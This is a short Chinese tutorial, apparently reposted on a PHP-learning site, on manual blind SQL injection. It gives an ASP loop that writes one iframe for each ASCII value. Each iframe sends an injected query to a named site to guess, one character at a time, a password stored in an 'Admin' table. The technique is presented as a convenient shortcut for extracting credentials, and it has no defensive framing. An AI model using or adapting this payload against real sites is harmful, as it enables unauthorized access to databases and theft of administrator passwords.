来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 到一个注入点是字符型的测试了几个工具貌似都不行那就只有手工了大家都知道 到猜解值的时候一个一个asc大小的比较还是比较麻烦的所以想到这个%for s=40 to 128response.write iframe src=htt...
|
到一个注入点是字符型的
测试了几个工具貌似都不行 那就只有手工了 大家都知道 到猜解值的时候一个一个asc大小的比较还是比较麻烦的 所以想到这个 <% for s=40 to 128 response.write "<iframe src=""http://www.2cto.com /default.asp?id=111111' and 1=(select top 1 count(*) from Admin where Asc(mid(password,3,1))="&s&") and '1'='1""></iframe>" next %> 这样一下就能显示所以存在的可能 就能很方便的查看哪个值对应的页面有所不一样 摘自 影子鹰 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
